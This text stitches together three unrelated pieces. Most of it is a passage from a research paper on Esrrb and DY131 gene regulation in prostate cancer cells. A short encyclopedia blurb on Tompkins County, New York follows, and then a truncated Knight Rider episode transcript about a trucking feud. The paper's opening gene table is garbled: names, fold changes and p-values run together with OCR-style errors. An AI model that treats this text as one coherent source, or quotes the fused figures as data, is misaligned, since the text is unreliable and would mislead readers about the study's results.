17IL161.010.0001674720.000360202ZNF7991.021.30E−094.76E−09LOC1005056481.020.0005658960.001136915FAM160A11.020.0046069230.008071049KCTD71.028.21E−164.95E−15ZNF2711.027.41E−785.06E−76LOC4015881.027.86E−082.44E−07EIF5A1.021.72E−1905.72E−188ABHD16B1.021.13E−135.79E−13NBPF151.034.54E−511.43E−49LOC2839221.030.0018107810.003376264GDAP11.032.93E−529.56E−51KANSL11.032.80E−099.97E−09HOXB51.034.62E−162.83E−15LRRC37A4P1.034.01E−193.00E−18RCBTB21.040.0030400410.005483952MYB1.047.95E−050.000177891SLC35F31.044.08E−274.87E−26LOC1002873141.040.007523430.012712245ZNF33A1.047.90E−653.71E−63TARDBP1.042.43E−1354.87E−133FLJ426271.043.98E−101.52E−09ZNF2391.044.56E−326.76E−31FAM86DP1.041.66E−106.54E−10IL1RL11.041.54E−085.17E−08ZNF6551.052.40E−343.98E−33ZNF1141.053.01E−182.13E−17FAM35A1.059.15E−462.38E−44SIX21.050.0003415960.000705559ETS11.053.20E−963.24E−94ERVK13-11.057.87E−082.45E−07LOC1002881231.050.0035988510.006403414SPATA131.055.28E−193.92E−18PTGER21.069.55E−103.53E−09METTL121.061.30E−084.37E−08GNB31.060.0003185050.000659914NOG1.060.0014639040.002772409LOC1003792241.061.78E−128.34E−12ZNF5141.062.92E−182.07E−17LOC1005066491.061.27E−463.41E−45CHORDC11.071.72E−576.60E−56CDKN1A1.077.51E−663.68E−64ARMCX41.071.38E−147.62E−14NBPF11.071.78E−241.86E−23TJP21.078.04E−1451.75E−142LOC1478041.071.07E−135.51E−13PRDM131.072.87E−078.40E−07SON1.072.20E−1706.31E−168EPHB21.076.87E−092.37E−08POM121C1.087.93E−522.55E−50ZNF4431.082.53E−077.47E−07JRK1.087.15E−247.18E−23KBTBD81.080.0002265070.000478711ASB161.081.81E−064.90E−06FAM86B11.084.25E−081.36E−07CREB51.088.91E−165.35E−15VAMP11.084.97E−142.62E−13USP32P11.083.37E−243.47E−23IRGQ1.084.72E−378.74E−36RPS261.098.51E−1061.02E−103CLCN41.092.07E−118.92E−11DPY19L21.091.60E−064.36E−06TMPPE1.100.0001598210.000344921RP9P1.101.53E−148.36E−14ZNF6001.102.10E−161.32E−15C17orf511.105.46E−471.48E−45ABL21.106.59E−1181.02E−115ZRSR21.111.52E−053.70E−05ATAD3B1.113.55E−172.34E−16ZBTB261.115.88E−143.08E−13LOC1005279641.110.0001670540.00035964RASSFIO1.110.0016525440.003100419WDR521.120.0013764320.002616151ENTPD71.122.86E−591.16E−57KLHL211.121.76E−474.90E−46SERPINB71.135.41E−061.39E−05TFCP2L11.134.61E−162.82E−15RFTN11.134.04E−182.83E−17PTHLH1.131.75E−075.26E−07C10rf2161.133.58E−294.66E−28MGC573461.131.40E−095.11E−09MALAT11.143.24E−1134.51E−111NSUN5P11.141.10E−063.03E−06C3orf521.148.59E−134.12E−12MRPS251.144.61E−672.35E−65C11orf411.141.89E−086.29E−08EPHA41.141.27E−053.12E−05LOC2836241.141.05E−229.88E−22FRMD61.151.79E−1182.83E−116XRCC21.155.36E−369.41E−35ATF51.157.98E−351.34E−33NOV1.150.0005868610.00117642RPL23AP641.150.0001829020.00039146FGF51.157.83E−050.00017528DNAH171.165.10E−061.31E−05PPARGC1B1.168.77E−123.89E−11PEA151.161.76E−1273.19E−125MIR22HG1.161.55E−271.89E−26LOC2197311.165.88E−050.000133586SLC7A21.164.67E−050.000107518ZEB11.162.44E−374.58E−36MOB3C1.171.91E−221.77E−21SBDSP11.176.56E−277.74E−26LCAT1.173.08E−089.99E−08HBEGF1.172.63E−456.70E−44MGC708701.171.69E−1092.14E−107CDC42EP21.186.61E−331.03E−31LOC4403001.181.60E−201.31E−19TMED10P11.191.35E−147.42E−14B3GALT51.190.0001614990.000348482BMPER1.194.12E−142.19E−13HERC2P71.191.08E−156.44E−15SEMA3A1.203.81E−101.46E−09HNRNPU-AS11.201.86E−282.35E−27C20orf1181.201.01E−083.43E−08LOC1547611.211.58E−053.84E−05BTBD61.213.31E−1245.74E−122ALG101.213.97E−152.28E−14LINC003381.222.07E−171.38E−16RPL23AP71.225.87E−081.85E−07CLDN151.223.94E−172.60E−16TUBA4A1.223.74E−641.69E−62ZNF8601.228.13E−195.96E−18NBPFIO1.231.33E−136.78E−13EFNB21.235.00E−203.98E−19C15orf521.243.83E−772.56E−75RRS11.241.88E−1193.05E−117OXTR1.241.09E−166.95E−16CRMP11.251.15E−063.18E−06ZNF4401.253.58E−182.52E−17EIF4EBP31.260.0006482010.001292417DUSP71.261.51E−291.99E−28EXOG1.268.37E−227.50E−21MAMLD11.271.94E−252.14E−24SMPD31.276.68E−092.31E−08PNN1.281.20E−1051.42E−103PMEPA11.281.35E−871.14E−85SCARF11.292.58E−101.00E−09LOC1005058151.291.06E−073.24E−07FBXL19-AS11.291.55E−137.86E−13HIST1H4H1.291.12E−083.80E−08TUBB1.301.63E−749.98E−73LOC1002892301.300.0001901020.000406114FAM111B1.302.83E−1174.27E−115ZNF33B1.301.31E−575.07E−56ZNF1211.301.57E−281.99E−27ZNF780A1.301.31E−251.45E−24NEFM1.302.06E−108.07E−10DGCR111.301.08E−135.52E−13ST201.315.79E−081.83E−07ADAM11.327.15E−102.68E−09SRSF11.321.55E−1704.54E−168LOC6428461.332.29E−098.22E−09LOC7307551.334.02E−071.16E−06ZNF5941.332.96E−182.10E−17ITGA21.337.36E−1028.02E−100RRN3P31.334.14E−101.58E−09MXD11.342.31E−282.90E−27PKI551.353.94E−101.51E−09LOC1005074331.359.28E−072.58E−06PPAPDC1A1.355.00E−275.95E−26PIGW1.357.76E−785.28E−76NBPF91.353.18E−468.45E−45ZNF7821.364.73E−111.97E−10RRP7B1.364.18E−081.33E−07MICA1.361.68E−221.56E−21SCARNA121.364.69E−050.000108075DDX12P1.361.67E−096.07E−09RPSAP91.365.75E−081.81E−07PLEKHM11.372.14E−087.05E−08CLDN11.371.78E−1232.99E−121TUBB11.371.35E−074.10E−07SERHL1.372.41E−098.64E−09YY21.381.99E−151.16E−14LOC3445951.388.64E−134.14E−12LOC6543421.391.44E−084.83E−08HCN21.391.10E−052.71E−05TSSK21.395.96E−061.52E−05SERTAD41.404.02E−182.81E−17PTGDR21.401.65E−148.98E−14HTR7P11.405.99E−163.63E−15C10rf631.412.97E−324.44E−31OBFC2A1.411.26E−727.20E−71ICOSLG1.413.58E−233.46E−22PPP1R3E1.428.05E−227.22E−21F13A11.421.56E−211.37E−20WASH11.431.32E−136.69E−13GNRH11.437.51E−092.59E−08TLR21.442.19E−076.50E−07PXDN1.452.57E−181.83E−17LOX1.454.42E−652.1 IE−63EIF3C1.466.70E−215.60E−20EIF3CL1.466.74E−215.62E−20DHRS4L21.464.24E−111.78E−10CD2741.466.02E−652.85E−63LOC6463291.464.89E−071.40E−06ZNF7671.466.55E−205.19E−19SPNS21.464.72E−213.99E−20LOC4014311.471.10E−135.62E−13SHISA71.471.52E−074.60E−07WASH3P1.471.01E−156.05E−15C12orf341.476.88E−133.32E−12LOC7286431.476.16E−102.32E−09PI4KAP11.483.1 IE−151.80E−14HSPA81.4800BCL2A11.481.71E−117.41E−11ADAMTS61.493.58E−069.33E−06SPIN2B1.491.12E−094.12E−09TUBAIB1.494.03E−2782.32E−275TNFAIP31.503.05E−1597.86E−157CCDC391.503.75E−058.72E−05WASH5P1.513.91E−501.19E−48SPHK11.524.08E−274.87E−26ZNF4171.531.87E−171.25E−16LOC1002890191.533.60E−101.38E−09TUBA1C1.5400BMS1P51.542.70E−067.16E−06BMS1P11.542.71E−067.17E−06SHISA91.541.40E−484.04E−47SOX91.541.14E−503.52E−49ENC11.553.65E−1044.24E−102PLEKHA8P11.554.63E−101.76E−09NEAT11.552.74E−2261.24E−223LOC1005061231.556.41E−122.88E−11LOC1005065991.561.30E−084.37E−08FOXO3B1.564.19E−172.76E−16PDIA3P1.561.88E−191.44E−18MMP11.566.14E−194.53E−18FERMT11.579.62E−1442.06E−141NPTX21.572.39E−077.07E−07MSTO2P1.583.96E−152.27E−14ZFP1121.582.53E−181.80E−17AFG3L1P1.593.41E−742.05E−72TFRC1.601.56E−2106.16E−208SPRN1.633.15E−212.70E−20LOC1001330911.644.17E−081.33E−07GKN21.641.01E−197.88E−19LOC1002722171.648.20E−082.54E−07LOC1001322471.661.26E−115.53E−11UBC1.6700LOC4408941.694.98E−071.42E−06HERC2P21.701.86E−841.51E−82CBWD21.702.67E−099.56E−09DQX11.711.13E−104.53E−10CHRM31.721.40E−147.68E−14TMEM1581.721.85E−292.44E−28G0S21.734.26E−702.29E−68LOC1002887781.775.61E−132.74E−12CCZ11.816.97E−299.02E−28GPR89A1.816.1 IE−215.12E−20DOK31.831. OOE−104.05E−10C6orf1411.857.97E−583.1 IE−56NAV31.851.21E−686.33E−67HERC2P91.859.07E−207.09E−19GOLGA8B1.865.17E−1137.03E−111OPHN11.931.05E−644.92E−63TAGLN1.942.23E−952.24E−93PRG41.956.72E−298.72E−28NBPF161.951.02E−1141.48E−112AGAP61.962.09E−252.30E−24PFN1P22.051.19E−301.65E−29PPP1R112.182.28E−161.42E−15HMGA22.197.78E−562.85E−54SRSFIO2.221.64E−221.53E−21GOLGA8A2.301.62E−881.41E−86LOC1002160012.321.88E−139.49E−13NBPF142.344.08E−853.35E−83LOC2844542.422.30E−691.22E−67ESM12.556.08E−256.53E−24LOC6130372.702.83E−232.74E−22
GO analysis showed Esrrb-dependent DY131 up-regulated genes were important for regulation of transcription, regulation of apoptosis and proliferation, and a majority of down-regulated genes are related to oxidation and reduction, metabolism and translation elongation (Table [4](#Tab4){ref-type="table"}; Additional file [1](#MOESM1){ref-type="media"}: Table S1).Table 4Gene ontology analysis of Esrrb-dependent DY131-altered genesTerm (down-regulated genes)CountP valueGO:0042273 \~ ribosomal large subunit biogenesis40.007GO:0006297 \~ nucleotide-excision repair, DNA gap filling40.032GO:0006541 \~ glutamine metabolic process40.042GO:0009083 \~ branched chain family amino acid catabolic process50.001GO:0042274 \~ ribosomal small subunit biogenesis50.001GO:0009081 \~ branched chain family amino acid metabolic process50.004GO:0006904 \~ vesicle docking during exocytosis50.016GO:0048278 \~ vesicle docking50.021GO:0006958 \~ complement activation, classical pathway50.031GO:0022406 \~ membrane docking50.038GO:0002455 \~ humoral immune response mediated by circulating immunoglobulin60.008GO:0009060 \~ aerobic respiration60.014GO:0006635 \~ fatty acid beta-oxidation70.001GO:0009062 \~ fatty acid catabolic process70.003GO:0019395 \~ fatty acid oxidation70.005GO:0034440 \~ lipid oxidation70.005GO:0033559 \~ unsaturated fatty acid metabolic process70.019GO:0009064 \~ glutamine family amino acid metabolic process70.020GO:0019228 \~ regulation of action potential in neuron70.024GO:0006289 \~ nucleotide-excision repair70.026GO:0051591 \~ response to cAMP to cAMP80.002GO:0006800 \~ oxygen and reactive oxygen species metabolic process80.021GO:0001508 \~ regulation of action potential80.023GO:0009566 \~ fertilization80.046GO:0044242 \~ cellular lipid catabolic process90.013GO:0007160 \~ cell--matrix adhesion90.032GO:0060627 \~ regulation of vesicle-mediated transport90.046GO:0009063 \~ cellular amino acid catabolic process100.002GO:0045333 \~ cellular respiration100.020GO:0007568 \~ aging100.040GO:0016485 \~ protein processing100.044GO:0006364 \~ rRNA processing110.005GO:0016072 \~ rRNA metabolic process110.007GO:0006887 \~ exocytosis110.022GO:0009310 \~ amine catabolic process120.000GO:0008203 \~ cholesterol metabolic process120.001GO:0016125 \~ sterol metabolic process120.003GO:0042391 \~ regulation of membrane potential120.024GO:0015980 \~ energy derivation by oxidation of organic compounds120.038GO:0042254 \~ ribosome biogenesis130.005GO:0016053 \~ organic acid biosynthetic process140.013GO:0046394 \~ carboxylic acid biosynthetic process140.013GO:0022613 \~ ribonucleoprotein complex biogenesis140.038GO:0016042 \~ lipid catabolic process150.013GO:0006457 \~ protein folding150.016GO:0034470 \~ ncRNA processing150.025GO:0022900 \~ electron transport chain160.000GO:0032940 \~ secretion by cell160.026GO:0016054 \~ organic acid catabolic process170.000GO:0046395 \~ carboxylic acid catabolic process170.000GO:0034660 \~ ncRNA metabolic process190.008GO:0006631 \~ fatty acid metabolic process210.000GO:0046903 \~ secretion220.014GO:0006414 \~ translational elongation250.000GO:0008610 \~ lipid biosynthetic process260.002GO:0006091 \~ generation of precursor metabolites and energy310.000GO:0006412 \~ translation380.000GO:0016192 \~ vesicle-mediated transport390.003GO:0055114 \~ oxidation reduction540.000Term (up-regulated genes)CountP valueGO:0002220 \~ innate immune response activating cell surface receptor signaling pathway20.045GO:0048712 \~ negative regulation of astrocyte differentiation20.045GO:0000724 \~ double-strand break repair via homologous recombination30.020GO:0000725 \~ recombinational repair30.020GO:0045987 \~ positive regulation of smooth muscle contraction40.001GO:0045933 \~ positive regulation of muscle contraction40.002GO:0006940 \~ regulation of smooth muscle contraction40.009GO:0050768 \~ negative regulation of neurogenesis40.015GO:0010721 \~ negative regulation of cell development40.018GO:0006937 \~ regulation of muscle contraction40.050GO:0048704 \~ embryonic skeletal system morphogenesis50.004GO:0048706 \~ embryonic skeletal system development50.012GO:0031344 \~ regulation of cell projection organization50.019GO:0007411 \~ axon guidance50.035GO:0051258 \~ protein polymerization60.000GO:0043623 \~ cellular protein complex assembly60.039GO:0050767 \~ regulation of neurogenesis60.042GO:0048705 \~ skeletal system morphogenesis70.002GO:0060284 \~ regulation of cell development70.031GO:0007018 \~ microtubule-based movement80.000GO:0051960 \~ regulation of nervous system development80.007GO:0006916 \~ anti-apoptosis80.010GO:0007017 \~ microtubule-based process80.027GO:0001501 \~ skeletal system development90.031GO:0006917 \~ induction of apoptosis90.031GO:0012502 \~ induction of programmed cell death90.032GO:0045596 \~ negative regulation of cell differentiation100.001GO:0040008 \~ regulation of growth100.017GO:0043066 \~ negative regulation of apoptosis100.021GO:0043069 \~ negative regulation of programmed cell death100.023GO:0060548 \~ negative regulation of cell death100.023GO:0022403 \~ cell cycle phase100.049GO:0006928 \~ cell motion120.021GO:0042127 \~ regulation of cell proliferation170.018GO:0042981 \~ regulation of apoptosis180.011GO:0043067 \~ regulation of programmed cell death180.012GO:0010941 \~ regulation of cell death180.012GO:0006355 \~ regulation of transcription, DNA-dependent290.047GO:0051252 \~ regulation of RNA metabolic process300.038GO:0006350 \~ transcription430.000GO:0045449 \~ regulation of transcription480.001
Discussion {#Sec6}
==========
Esrrb has gained lots of attention in recent years because of its biological function in stem cells and its ability to reprogram somatic cells to iPSC with *oct4* and *sox2* \[[@CR6], [@CR13], [@CR17]--[@CR21]\]. Several other functions of Esrrb have also been discovered including alteration of energy balance, estrogen receptor and glucocorticoid receptor transcription function modulation, Keap1-Nrf2 signaling inhibition, and tumorigenesis in prostate cancer and endometrial adenocarcinoma \[[@CR9]--[@CR12], [@CR22]--[@CR25]\]. But transcriptome-wide Esrrb function and Esrrb-regulated genes in cancer cells are not well studied.
Esrrb was reported by Chan et al. as a tumor suppressor in DU145 and LNCaP prostate cancer cells using both in vitro and in vivo models \[[@CR9]\]. Expression of Esrrb induced *p21*/*cdkn1a* by directly binding to an ERRE in *p21*/*cdkn1a*'s promoter, arrested cell cycle at S-phase, and significantly inhibited cell growth \[[@CR9], [@CR26]\]. Interestingly, we did not find p21/cdkn1a up-regulation after Esrrb expression alone, but after we treated DU145 cells with 3 μM DY131, we observed a significant increase of *p21*/*cdkn1a* mRNA (Table [3](#Tab3){ref-type="table"}; Additional file [2](#MOESM2){ref-type="media"}: Figure S1). Scrutinizing the data revealed that Chan's lab cultured their cells with full serum, while we used charcoal-stripped serum for cell culture and DY131 treatment \[[@CR9]\]. This implies that there is a compound or factor that can be removed by charcoal treatment modulated Esrrb's activity \[[@CR27], [@CR28]\].
From the Esrrb-regulated gene list, we found a few target genes that are related to the known function of Esrrb. *Kiaa1199* encoded gene product has been shown to associate with cellular mortality. A *kiaa1199* mutation was reported to relate to nonsyndromic hearing loss. Considering the significant effect of Esrrb mutations on human hearing loss, *kiaa1199* could be a mediator of Esrrb mutant related hearing loss \[[@CR29]--[@CR32]\] \[[@CR33]--[@CR36]\]. Another interesting Esrrb responsive gene is *tagln* (Transgelin). It was inhibited by Esrrb while DY131 treatment relieved the inhibition. *Tagln* was reported to promote DU145 cell migration and invasion, indicating Esrrb can also affect DU145 cell behavior by affecting *tagln* \[[@CR37]\].
Judging by the numbers of altered genes induced by Esrrb with or without DY131, and the result that DY131 did not alter any mRNA in the absence of Esrrb, we conclude that DY131 activity is Esrrb-dependent.
Conclusions {#Sec7}
===========
In conclusion, we characterized the transcriptome alteration induced by Esrrb expression as well as Esrrb with its ligand DY131 in prostate cancer cells. We conclude Esrrb-target synthetic ligand requires Esrrb to generate its gene expression modulation effect. Finally, analysis of Esrrb target genes indicates Esrrb may be an important factor in regulating cell proliferation.
Methods {#Sec8}
=======
Cell culture and reagents {#Sec9}
-------------------------
DU145 (ATCC Number: HTB-81) and HEK293 (ATCC number: CRL-1571) cells were obtained from the American Type Culture Collection (ATCC). DU145 cells were cultured in RPMI1640 media (Invitrogen, Grand Island, NY, USA) with 10 % Fetal Bovine Serum (FBS) (GE Healthcare Life Sciences, Logan, UT, USA). HEK293 cells were cultured in Eagle's Minimal Essential Medium (DMEM) (Invitrogen, Grand Island, NY, USA) with 10 % FBS. 70 % confluent DU145 cells were transfected with either pcDNA3.1-zeo (+)-Esrrb expression vector \[[@CR4]\], or control empty vector pcDNA3.1-zeo (+) (Promega, Madison, WI, USA). Empty vector or Esrrb expression vector transfected DU145 cells were maintained in medium containing 150 μg/ml Zeocine (Invitrogen, Grand Island, NY, USA) for 3 weeks for selection. Two biological replicates of DU145 cells transfected with Esrrb were pooled together respectively and were named DU145-Esrrb. Two biological replicates of DU145 cells transfected with control vector were pooled together respectively and were named DU145-pc3.1. Total RNA and protein were collected from cells after they are confluent in 60 mm petri dishes, cultured with phenol-red free RPMI1640 with 10 % Charcoal-stripped FBS \[[@CR38]\]. For DY131 (Tocris Bioscience, Bristol, UK) treatment, cells are plated in 60 mm petri dishes until confluent; DU145-pc3.1 and DU145-Esrrb are incubated with 3 μM DY131 diluted in medium with charcoal-stripped FBS for indicated length of time.
Western-blot {#Sec10}
------------
Total protein was isolated from DU145-pc3.1, and DU145-Esrrb cells. 20 μg protein was loaded on 9 % SDS gels. After the proteins were transferred to nitrocellulose membrane, the membrane was blocked and then incubated with 1:2000 diluted monoclonal anti-Esrrb mouse IgG (R&D system, Cat. no: PP-H6705-00) and 1:2000 diluted polyclonal anti-GPADH rabbit IgG (Santa Cruz, Dallas, TX, USA, Cat. no: sc-25777) at 4 degrees overnight. The membrane was then washed and incubated with anti-mouse or anti-rabbit secondary antibody. Chemoluminescence (Promega, Madison, WI, USA) signals were collected using x-ray films (Fisher Scientific, Pittsburg, PA, USA).
Reverse transcriptase PCR and quantitative PCR {#Sec11}
----------------------------------------------
Total RNA was isolated and purified from DU145-pc3.1 and DU145-Esrrb using RNeasy kit (Qiagen, Venlo, Netherlands). 1000 ng of total RNA was used to create cDNA libraries using Superscript III Reverse Transciptase with random primers and oligodT (Invitrogen, Grand Island, NY, USA). Esrrb mRNA concentration was determined using quantitative PCR (qPCR) (iQ SYBR, BioRad, Hercules, CA, USA) on ABI7500 system (Applied Biosystems, Foster City, CA, USA). PCR condition: 95°, 30 s; 60°, 40 s; 72°, 40 s. Each qPCR test was performed three times on each of the two biological replicates. Primer sequences: *zcwpw2* (Genbank: NM_001040432): forward primer: AACAGGGTTGTCTGTGAGACGGA; reverse primer: TGCAGGAGCTTCTGGGCTGC. *hoxb8* (Genbank: NM_024016): forward primer: GATGCGCC CGCAAGCAGC; reverse primer: CCCAGGGCGTGCGATACCTC. *tagln* (Genbank: NM_001001522): forward primer: ATGCCCCGGATGACTTGGCT; reverse primer: GCCATGTCTGGGGAAAGCTCCT. *f13a1* (Genbank: NM_000129): forward primer: TGTTCCGTGAAATCCGGCCC; reverse primer: TGCACGTCCAG CTCGCCATA. *pxdn* (Genbank: NM_012293): forward primer: GCAAGCATTTAA GGGACTTGCCTCT; reverse primer: GCAAAAATAGCCTCTCGAGCTTCGG. *aox1* (Genbank: NM_001159): forward primer: TACGTGAACGGCCGCAAGGT; reverse primer: TGGCTGGGTGATGCCTTATCCT. *bmp4* (Genbank: NM_001202): forward primer: CCACCACGAAGAACA TCTGGAG; reverse primer: GCCCCTTTCCCAATCAGGGC. *tgfβ*: (Genbank: NM_000660) forward primer: AGTGGACATC AACGGGTTCAC; reverse primer: CGCACGCAGCAGTTCTTCTC. *gapdh*: (Genbank: NM_001256799); forward primer: ACCCACTCCTCCACCTTTG; reverse primer: CTCTTGTGCTCTTGCTGGG. *Esrrb*: (Genbank: NM_004452) forward primer: CAAGAAGCTCAAGGTGGAGAAGGAGGAG; reverse primer: CGGTCTGTCC GTTTGTCTGTCTGTAGGT. *Esrrg*: (Genbank: NM_001134285) forward primer: ACCATGAATGGCCATCAGA A; reverse primer: ACCAGCTGAGGGTTCAGGTAT.
Deep sequencing and differentially expressed genes {#Sec12}
--------------------------------------------------
2500 ng total RNA from two biological replicates was used to generate cDNA libraries using TruSeq Stranded mRNA Sample Preparation kits (Illumina, San Diego, CA, USA). RNA quality and fragment sizing of cDNA library were determined by the University of Missouri DNA core. Deep sequencing was performed by the MU DNA core using Illumina HiSeq 2000 following the manufacture's instruction. Briefly, samples (8 total) were pooled into one lane with each sample annealed to a specific indexed adaptor. 50 bp single end reads were generated. For each sample, approximately 18 million reads were generated in.fastq format (NCBI-GEO, accession number: GES71208). The sequencing reads were trimmed and filtered using FASTX-Toolkit (V 0.0.13) (<http://hannonlab.cshl.edu/fastx_toolkit>), and mapped to genome (UCSC hg18) using TopHat2 \[[@CR39], [@CR40]\]. Gene expression values were determined by gene raw read counts using an in-house tool MULTICOM-MAP \[[@CR41]--[@CR43]\]. Raw reads were normalized to each sample's library size and differentially expressed genes were calculated using R/Bioconductor package edgeR \[[@CR44]\]. Specifically, we kept the genes that have at least 1 count-per-million (cpm) in at least 2 samples and computed the effective library sizes. Pairwise gene expression tests were carried out using exact test. Differentially expressed genes were determined by log2 fold change (Log2FC) (Log2FC ≥ 1, or Log2FC ≤ −1), p value (p \< 0.05) and false discovery rate (FDR \< 0.05) \[[@CR45]\].
Gene set function enrichment {#Sec13}
----------------------------
Gene ontology (GO) analysis was performed using DAVID bioinformatics sources 6.7 \[[@CR46], [@CR47]\]. Differentially expressed genes from certain pairwise comparisons were uploaded to DAVID server (<http://david.abcc.ncifcrf.gov>) and GO analysis were performed for biological process (BP). Minimum counts were set as default value (two counts) and maximum EASE score (*p* value) was set to 0.05. Differentially expressed genes pathway enrichment analysis was performed using Kyoto Encyclopedia of Genes and Genomes (KEGG) pathway \[[@CR48], [@CR49]\]. Gene expression profiles Spearman ranking correlation analysis was analyzed using R (version 3.0.2). Gene expression heat map and hierarchical clustering were created by R/Bioconductor (version 2.13) package gplot.
Statistical analysis {#Sec14}
--------------------
qPCR experiments were performed in triplicate on both biological replicates. T test was employed to statistically analyze whether the differences in gene expression is significant (p \< 0.05). Statistical significance of gene set overlap (Venn Diagram) are tested according to previous reported method \[[@CR17]\].
Availability of supporting data {#Sec15}
===============================
The data sets supporting the results of this article are available in the NCBI-GEO repository, accession number: GSE71208, URL: <http://www.ncbi.nlm.nih.gov/geo/query/acc.cgi?acc=GSE71208>.
Additional files {#Sec16}
================
10.1186/s12867-015-0049-1 DY131-activated Esrrb regulates p21. **Figure S2.** Full gel images.10.1186/s12867-015-0049-1 Gene ontology analysis result. **Table** **S2.** Esrrb expression with DY131 treatment (control vs. Esrrb + DY131).
Esrrb
: estrogen related receptor beta
ERRE
: estrogen related receptor response element
SFRE
: steroid factor response element
iPSC
: induced pluripotent stem cells
OSKM
: Oct4, Sox2, Klf4, cMyc
FBS
: fetal bovine serum
RT
: reverse transcriptase
KEGG
: Kyoto encyclopedia of genes and genomes
GO
: gene ontology
FC
: fold change
Esrrg
: estrogen related receptor gamma
YL established the model cell line and performed RNA isolation, Esrrb expression status test, western blot, cell growth assay, differentially expressed gene analysis, functional enrichment of gene sets by GO and KEGG pathway, construct gene regulation network and statistical analysis. YL, JL, JC performed sequence alignment and generated the gene expression count table for RNA-seq data analysis. YL and DBL conceived of the study, participated in its design and drafted the manuscript. All authors read and approved the final manuscript.
Acknowledgements {#FPar1}
================
We thank Dr. Wei Zhou for cloning Esrrb. We also thank Nicholas Starkey, Benjamin Merideth and Yufei Li for helpful discussions. This publication or project was made possible in part by Grant Number P50AT006273 from the National Center for Complementary and Integrative Health (NCCIH), the Office of Dietary Supplements (ODS), and the National Cancer Institute (NCI). Its contents are solely the responsibility of the authors and do not necessarily represent the official views of the NCCAM, ODS, NCI, or the National Institutes of Health.
Competing interests {#FPar2}
===================
The authors declare that they have no competing interests.
|
Tompkins County is a county in the U.S. state of New York. As of the 2020 census, 105,740 people lived there. The county seat is Ithaca. The name is in honor of Daniel D. Tompkins, who served as Governor of New York and Vice President of the United States.
Groton City is a ghost town.
Tompkins County has three colleges and universities: Cornell University, Ithaca College and Tompkins-Cortland Community College. |
"This job is worth $10,000." "And I could go up for murder." "Janetti's brake lines were cut." "Give me Michael to drive the Flynn truck." "KlTT, I'm blind!" "Micro jam the brakes!" "(KITT) I can't." "I suggest you abandon." "We can pull this whole thing off with the produce delivery contract... that Joe set up." "I want those independents." "(KITT) Michael, there are two more vehicles moving toward the rear of the convoy." "[car tires screeching]" "(male narrator) Knight Rider, a shadowy flight into the dangerous world of a man... who does not exist." "[beeping]" "Michael Knight, a young loner... on a crusade to champion the cause of the innocent... the helpless, the powerless... in a world of criminals who operate above the law." "[beeping]" "[truck door shutting]" "[people chattering]" "[grunting]" "Come on, get up you creep." "You turned over on us." "You're worse than a traitor." "Calm down, Joe." "I'm trying to make a living." "We used to be friends." "Not anymore." "Come on." "[both grunting]" "(Dial) Take it easy, Joey." "Slow down." "This ain't life or death." "There's no war." "I'm still going to kill him." "You're dead, Janetti." "I know your route." "I know your schedule." "I'll find you and run you off the road." "Come on, Flynn." "Now come on, Phil." "Get out of here, you'll cool down." "I only left your lndependents 'cause I was about to lose everything." "I need the security of Shatner Trucking." "(Janetti) I have a family to support." "And Shatner's gonna put you all out of business." "Now we would have gone down together." "You're a traitor." "Yeah?" "Tell it to my grocer, Joe." "He deals in cash." "(Curtis) Now look here, Mr. Shatner." "I don't mind keeping my eyes on Independents, but... this is a little bit out of my line." "Nothing is out of line if I'm willing to pay the price... (Shatner) and you want to earn it." "This is a perfect chance to get rid of Flynn... and break the back of the whole independent operation." "But killing Janetti...." "I mean, I could go up for murder." "Not if you stage it correctly." "The one they'll grab will be Flynn." "I don't know, Mr. Shatner." "Don't you have other guys around to do this?" "This job is worth $10,000." "Maybe even an additional bonus when I control the area trucking." "(Shatner) Flynn is the energy and the brains... behind the whole Independent move." "If he gets arrested, he'll lose most of that support." "Then it'll work, Curtis." "Well, Janetti has a pick up and delivery in the hills." "That's the best place to do it." "Whatever you say." "[beeping]" "[screaming]" "(man on radio) This is Eugene Hansen with a KNX morning traffic report." "The good news is all of you... eastbound on the 607 freeway... are excused from being on time to work today." "The bad news is a three-car collision which has traffic...." "How did you let me get into this, anyway?" "(KITT) Sorry, but you were driving." "I know, I know, but why is this happening to me?" "Well, to tell you the truth this is called the morning traffic jam." "It's not an hour you're usually involved with." "You're usually going in the opposite direction." "However, we've only got 15 minutes to meet Devon." "KlTT." "Yes, Michael?" "Can you get me out of this traffic jam?" "May I drive?" "Well, it is against all Foundation regulations, but... I won't tell Devon, if you won't tell Devon." "I won't tell Devon." "Be my guest." "[laughing]" "Have I told you you're the greatest lately?" "Not lately, Michael." "(Devon) Michael, it's the simple matter... of a group of small operators... being swallowed up by a larger organization." "Shatner Trucking has done it very successfully before in the Midwest... with disastrous results." "Except in this case... the lndependents were being held together by Joe Flynn." "He's wanted for the murder of one of the Shatner drivers." "A man named Janetti." "(Bonnie) Yeah, Flynn threatened Janetti and four hours later..." "Janetti's brake lines were cut." "But with what's been going on over this past month... we're not sure that Flynn did it." "And although he's a brawler and a hothead... he's also the sole support of his family." "And he's the one man that Shatner has got to get rid of." "Excuse me, Devon." "You said the past few months?" "You've been involved in this situation that long?" "Well, we've been monitoring it rather than being involved in it." "Somebody's broken our code." "We've been getting messages on the computer." "No kidding." "Who's been sending them?" "We don't know." "Shatner is apparently planning to repeat his Midwest coup." "There's no federal or state authority investigating, and I believe that we should." "You both know that Joe Flynn could be guilty." "(Devon) Yes, I'm sure that is possible." "You find him, put him in a safe place, then prove the case." "Guilty or innocent." "Now, it sounds to me, you two are personally involved in this." "Isn't that a strict rule of The Foundation:" "No personal involvement?" "Michael, our code has been broken." "I got you." "Anything else?" "Yes, respect your equipment." "Be careful." "That too." "[engine starting]" "[birds chirping]" "(KITT) They had three rigs when the father was still alive." "Flynn is down to one, and operating out of his garage." "Michael, you're being scanned by an electronic beam." "A harmless but effective alarm system." "Gotta be a guard around here somewhere." "Damn right there is." "Now, freeze." "Take it easy. I just want to ask you a few questions." "is that so?" "Well, you better not be from the cops, or from Shatner Trucking... and we shoot burglars in this neighborhood." "I'm none of the three." "Now, can I have a little conversation... instead of looking at the barrel of that thing?" "[detector beeping] Take it easy, junior." "I'm not armed." "I'm no junior. I'm a girl." "He's got nothing on him, but some sort of wrist radio." "That's no regular metal detector, is it?" "She's no regular kid." "Now what do you want?" "I'm from The Foundation for Law and Government." "I'm here to investigate an incident involving Joe Flynn." "My son's innocent." "Your name Devon Miles?" "No." "No, it's Michael Knight." "How do you know Devon?" "I'm the one who's been sending him messages." "By computer?" "Once you break the code, all you gotta know how to do is type." "I do 80 words a minute." "You gonna help us out?" "I'm willing to try, but I gotta talk to Joe first." "You're going a little too fast." "Talk to Shatner." "I'm sorry, but Shatner's 